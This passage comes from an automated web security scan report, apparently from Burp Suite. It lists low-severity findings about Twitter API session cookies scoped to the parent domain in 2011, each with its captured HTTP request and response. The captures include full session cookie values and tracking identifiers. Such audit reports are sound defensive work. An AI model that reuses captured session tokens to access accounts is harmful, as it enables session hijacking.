Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmb=43838368.1.10.1315055110; __utmc=43838368; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx; original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yAToHaWQiJWMwZjc0Y2Y5NzAzODgxYzk2%250ANDA4NDRjYjJiMWQwZjc0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--2bdd9ccfd8301fad420f5a78e2f8cdea7f06f986

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:10:23 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315055423-24298-25111
X-RateLimit-Limit: 150
ETag: "ba793ac022c58267c2b011c5d69d6fa8"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Sat, 03 Sep 2011 13:10:23 GMT
X-RateLimit-Remaining: 114
X-Runtime: 0.06922
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114c0426a34
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 94000fb7a11d6cd186ccd2044a4f0420af8e80b6
X-RateLimit-Reset: 1315058926
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yAToHaWQiJWMwZjc0Y2Y5NzAzODgxYzk2%250ANDA4NDRjYjJiMWQwZjc0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--2bdd9ccfd8301fad420f5a78e2f8cdea7f06f986; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 39431
Connection: close

twitterCallback1([{"id_str":"109738122539040768","in_reply_to_status_id":null,"truncated":false,"user":{"profile_sidebar_fill_color":"8a8f88","protected":false,"id_str":"26541422","notifications":fals
...[SNIP]...

10.5. http://api.twitter.com/1/statuses/user_timeline/msnewengland.json previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://api.twitter.com
Path:	/1/statuses/user_timeline/msnewengland.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

_twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yASIKZmxhc2hJQzonQWN0aW9uQ29udHJv%250AbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJWMwZjc0%250AY2Y5NzAzODgxYzk2NDA4NDRjYjJiMWQwZjc0--8a55b228d53168b95cece830b4c206eb17826d5f; domain=.twitter.com; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/user_timeline/msnewengland.json?callback=twitterCallback1&count=20&include_rts=true&cb=0.09756158874370158 HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Working/Jobs/tabid/145/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmb=43838368.1.10.1315055110; __utmc=43838368; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx; original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCCzwYy8yAToOcmV0dXJuX3RvIiRodHRwOi8v%250AdHdpdHRlci5jb20vbXNmdHJlc2VhcmNoIgpmbGFzaElDOidBY3Rpb25Db250%250Acm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOgdpZCIlYzBm%250ANzRjZjk3MDM4ODFjOTY0MDg0NGNiMmIxZDBmNzQ6DGNzcmZfaWQiJWI0ZDE4%250AYzBiMTIzNjFiMjllNjg3ODEwMzg0ZGM0Njdh--d45c6815ed8f43855aff674ef2335380c015147e

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:08:46 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315055326-49454-28329
X-RateLimit-Limit: 150
ETag: "6e2a84db79cba3eb632f2bb0a5aa9bf0"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Sat, 03 Sep 2011 13:08:46 GMT
X-RateLimit-Remaining: 148
X-Runtime: 0.02787
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114c0426a34
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 89b406751d38c59e2b9f4ed8f6d34c2fe2eddb34
X-RateLimit-Reset: 1315058926
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yASIKZmxhc2hJQzonQWN0aW9uQ29udHJv%250AbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJWMwZjc0%250AY2Y5NzAzODgxYzk2NDA4NDRjYjJiMWQwZjc0--8a55b228d53168b95cece830b4c206eb17826d5f; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 72091
Connection: close

twitterCallback1([{"retweeted_status":{"id_str":"109776676589801472","in_reply_to_status_id":null,"truncated":false,"user":{"profile_sidebar_fill_color":"C0DFEC","protected":false,"id_str":"259784927"
...[SNIP]...

10.6. http://api.twitter.com/1/trends/1.json previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://api.twitter.com
Path:	/1/trends/1.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

_twitter_sess=BAh7CzoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoVaW5fbmV3X3VzZXJfZmxvdzA6D2NyZWF0ZWRfYXRsKwgs8GMvMgE6B2lk%250AIiVjMGY3NGNmOTcwMzg4MWM5NjQwODQ0Y2IyYjFkMGY3NCIKZmxhc2hJQzon%250AQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7%250AAA%253D%253D--3d57475cc03ae064aa02ac897973859ef1392693; domain=.twitter.com; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/trends/1.json?pc=false&personalized=false HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://api.twitter.com/receiver.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
X-Phx: true
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmb=43838368.2.10.1315055110; __utmc=43838368; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx; _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yASIKZmxhc2hJQzonQWN0aW9uQ29udHJv%250AbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJWMwZjc0%250AY2Y5NzAzODgxYzk2NDA4NDRjYjJiMWQwZjc0--8a55b228d53168b95cece830b4c206eb17826d5f

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:15:01 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315055701-14511-3550
X-RateLimit-Limit: 1000
ETag: "4ae65bcc6c25f8e92921d564b5f52cc0"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Sat, 03 Sep 2011 13:15:01 GMT
X-RateLimit-Remaining: 918
X-Runtime: 0.00951
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114c0426a34
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api_phoenix
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: max-age=300, must-revalidate
X-MID: a3b38fddc509eeacb27be351b79049caf50a7c6f
X-RateLimit-Reset: 1315058673
Set-Cookie: _twitter_sess=BAh7CzoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoVaW5fbmV3X3VzZXJfZmxvdzA6D2NyZWF0ZWRfYXRsKwgs8GMvMgE6B2lk%250AIiVjMGY3NGNmOTcwMzg4MWM5NjQwODQ0Y2IyYjFkMGY3NCIKZmxhc2hJQzon%250AQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7%250AAA%253D%253D--3d57475cc03ae064aa02ac897973859ef1392693; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 1732
Connection: close

[{"as_of":"2011-09-03T13:11:07Z","locations":[{"woeid":1,"name":"Worldwide"}],"trends":[{"query":"%2310CancionesQueNoVoyOlvidar","name":"#10CancionesQueNoVoyOlvidar","url":"http:\/\/twitter.com\/searc
...[SNIP]...

10.7. http://api.twitter.com/1/trends/available.json previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://api.twitter.com
Path:	/1/trends/available.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

_twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yAToHaWQiJWMwZjc0Y2Y5NzAzODgxYzk2%250ANDA4NDRjYjJiMWQwZjc0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--2bdd9ccfd8301fad420f5a78e2f8cdea7f06f986; domain=.twitter.com; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/trends/available.json?lang=en HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://api.twitter.com/receiver.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
X-Phx: true
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmb=43838368.2.10.1315055110; __utmc=43838368; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx; _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yAToHaWQiJWMwZjc0Y2Y5NzAzODgxYzk2%250ANDA4NDRjYjJiMWQwZjc0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--2bdd9ccfd8301fad420f5a78e2f8cdea7f06f986

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:15:01 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315055701-11220-58142
X-RateLimit-Limit: 1000
ETag: "f827a919eae7f84ffa87a2017bfa70a7"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Sat, 03 Sep 2011 13:15:01 GMT
X-RateLimit-Remaining: 924
X-Runtime: 0.09612
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114c0426a34
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api_phoenix
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: max-age=2592000, must-revalidate
X-MID: f35ebe7707e2a60c095bd4a08d8619b5927749e4
X-RateLimit-Reset: 1315058673
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yAToHaWQiJWMwZjc0Y2Y5NzAzODgxYzk2%250ANDA4NDRjYjJiMWQwZjc0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--2bdd9ccfd8301fad420f5a78e2f8cdea7f06f986; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 21317
Connection: close

[{"woeid":23424969,"name":"Turkey","parentid":1,"url":"http:\/\/where.yahooapis.com\/v1\/place\/23424969","placeType":{"name":"Country","code":12},"countryCode":"TR","country":"Turkey"},{"woeid":23645
...[SNIP]...

10.8. http://api.twitter.com/1/urls/resolve.json previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://api.twitter.com
Path:	/1/urls/resolve.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

_twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yAToHaWQiJWMwZjc0Y2Y5NzAzODgxYzk2%250ANDA4NDRjYjJiMWQwZjc0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--2bdd9ccfd8301fad420f5a78e2f8cdea7f06f986; domain=.twitter.com; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/urls/resolve.json?urls%5B%5D=http%3A%2F%2Ft.co%2FDZbwq2r&urls%5B%5D=http%3A%2F%2Ft.co%2FBvjrJND&urls%5B%5D=http%3A%2F%2Ft.co%2FNXvo96p&urls%5B%5D=http%3A%2F%2Ft.co%2FJEK0Uwt&urls%5B%5D=http%3A%2F%2Ft.co%2Frmivlz6&urls%5B%5D=http%3A%2F%2Ft.co%2FLCS6x0L HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://api.twitter.com/receiver.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
X-Phx: true
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmb=43838368.2.10.1315055110; __utmc=43838368; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCCzwYy8yAToOcmV0dXJuX3RvIiRodHRwOi8v%250AdHdpdHRlci5jb20vbXNmdHJlc2VhcmNoOgdpZCIlYzBmNzRjZjk3MDM4ODFj%250AOTY0MDg0NGNiMmIxZDBmNzQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6%250AOkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6DGNzcmZfaWQiJWI0ZDE4%250AYzBiMTIzNjFiMjllNjg3ODEwMzg0ZGM0Njdh--a4167d343994f3345ca9273ae21febed2a6a18bb

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:15:03 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315055703-76483-6679
X-RateLimit-Limit: 1000
ETag: "1cd5ae66a39669107f466e34aeb2db0a"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Sat, 03 Sep 2011 13:15:03 GMT
X-RateLimit-Remaining: 838
X-Runtime: 0.00848
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114c0426a34
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api_phoenix
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 20bbd750b9efae64a1a49d6f2193f5447800ef9d
X-RateLimit-Reset: 1315058673
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yAToHaWQiJWMwZjc0Y2Y5NzAzODgxYzk2%250ANDA4NDRjYjJiMWQwZjc0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--2bdd9ccfd8301fad420f5a78e2f8cdea7f06f986; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 731
Connection: close

{"http:\/\/t.co\/BvjrJND":"http:\/\/frankgruber.me\/post\/9683723109\/were-underway-at-the-techcocktail-boston-summer\/","http:\/\/t.co\/NXvo96p":"https:\/\/foursquare.com\/alwillis\/checkin\/4e6010b8
...[SNIP]...

10.9. http://api.twitter.com/1/users/search.json previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://api.twitter.com
Path:	/1/users/search.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

_twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yAToHaWQiJWMwZjc0Y2Y5NzAzODgxYzk2%250ANDA4NDRjYjJiMWQwZjc0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--2bdd9ccfd8301fad420f5a78e2f8cdea7f06f986; domain=.twitter.com; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/users/search.json?reputable=true&display_location=search-component&pc=true&q=%23TechCocktailBOS HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://api.twitter.com/receiver.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
X-Phx: true
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmb=43838368.2.10.1315055110; __utmc=43838368; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx; _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yAToHaWQiJWMwZjc0Y2Y5NzAzODgxYzk2%250ANDA4NDRjYjJiMWQwZjc0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--2bdd9ccfd8301fad420f5a78e2f8cdea7f06f986

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:15:01 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315055701-45108-50610
X-RateLimit-Limit: 1000
ETag: "d751713988987e9331980363e24189ce"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Sat, 03 Sep 2011 13:15:01 GMT
X-RateLimit-Remaining: 928
X-Runtime: 0.02260
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114c0426a34
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api_phoenix
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: f93599e88aea3aada9e6f45227542fc39a33d090
X-RateLimit-Reset: 1315058673
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yAToHaWQiJWMwZjc0Y2Y5NzAzODgxYzk2%250ANDA4NDRjYjJiMWQwZjc0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--2bdd9ccfd8301fad420f5a78e2f8cdea7f06f986; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 2
Connection: close

[]

10.10. http://api.twitter.com/i/search/image_facets.json previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://api.twitter.com
Path:	/i/search/image_facets.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

_twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yAToHaWQiJWMwZjc0Y2Y5NzAzODgxYzk2%250ANDA4NDRjYjJiMWQwZjc0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--2bdd9ccfd8301fad420f5a78e2f8cdea7f06f986; domain=.twitter.com; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i/search/image_facets.json?q=%23TechCocktailBOS&count=100&include_entities=true HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://api.twitter.com/receiver.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
X-Phx: true
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; k=50.23.123.106.1314797552347130; original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; __utma=43838368.1721518288.1314976448.1314976448.1315055110.2; __utmb=43838368.2.10.1315055110; __utmc=43838368; __utmz=43838368.1315055110.2.2.utmcsr=research.microsoft.com|utmccn=(referral)|utmcmd=referral|utmcct=/en-us/projects/wwt/contest.aspx; _twitter_sess=BAh7CjoMY3NyZl9pZCIlYjRkMThjMGIxMjM2MWIyOWU2ODc4MTAzODRkYzQ2%250AN2E6DnJldHVybl90byIkaHR0cDovL3R3aXR0ZXIuY29tL21zZnRyZXNlYXJj%250AaDoPY3JlYXRlZF9hdGwrCCzwYy8yAToHaWQiJWMwZjc0Y2Y5NzAzODgxYzk2%250ANDA4NDRjYjJiMWQwZjc0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpG%250AbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--2bdd9ccfd8301fad420f5a78e2f8cdea7f06f986

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:15:01 GMT
Server: hi
Status: 200 OK
X-Transaction: 1315055701-44326-31901
X-RateLimit-Limit: 1000
ETag: "d751713988987e9331980363e24189ce"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Sat, 03 Sep 2011 13:15:01 GMT
X-RateLimit-Remaining: 919
X-Runtime: 0.04123
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114c0426a34
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api_phoenix
X-Content-Type-Options: nosniff
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 5334a5d9d0766cf62564aec25fcc48f383905b2a
X-RateLimit-Reset: 1315058673
